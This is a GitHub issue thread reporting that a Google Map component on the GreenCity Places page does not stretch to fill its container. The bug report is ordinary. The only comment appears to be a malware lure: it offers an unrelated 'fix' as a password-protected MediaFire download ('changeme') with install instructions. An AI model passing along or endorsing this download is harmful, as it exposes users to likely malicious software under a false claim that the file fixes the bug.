### ISSUE TITLE
[Places.Google-map] Google Map Component Not Stretching to Full Container Height and Width

### ISSUE THREAD

**Issue by jaworovcki** [ita-social-projects/GreenCity#7386]
**Environment:** Windows, Chrome 128.0.6613.86
**Reproducible:** always

**Steps to reproduce**
1. Go to [link](https://www.greencity.cx.ua/#/greenCity)
2. The user must be logged in to the system
3. Go to Places page

**Actual result**
Google map component does not strech to fill the full height and width of its parent container and it differs from the mockup.
![image](https://github.com/user-attachments/assets/5b0ebb63-7321-49b5-8833-056525580d0d)

**Expected result**
Google map component should be on the same line with the sidebar and have the width of the parent container
![image](https://github.com/user-attachments/assets/9836e0b1-0a9c-4771-adcc-396fce383d78)

**User story and test case links**
Mockup: [link](https://www.figma.com/design/092AhCGadc1Hq8nAysxmYB/ITA-Greencity-%D0%A3%D0%91%D0%A1?node-id=13787-55543&node-type=CANVAS&t=OzwO51bQNmLZXnS2-0)

**Labels to be added**
"Bug", Priority ("pri:low "), Severity ("severity:trivial"), Type ("UI), Places

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
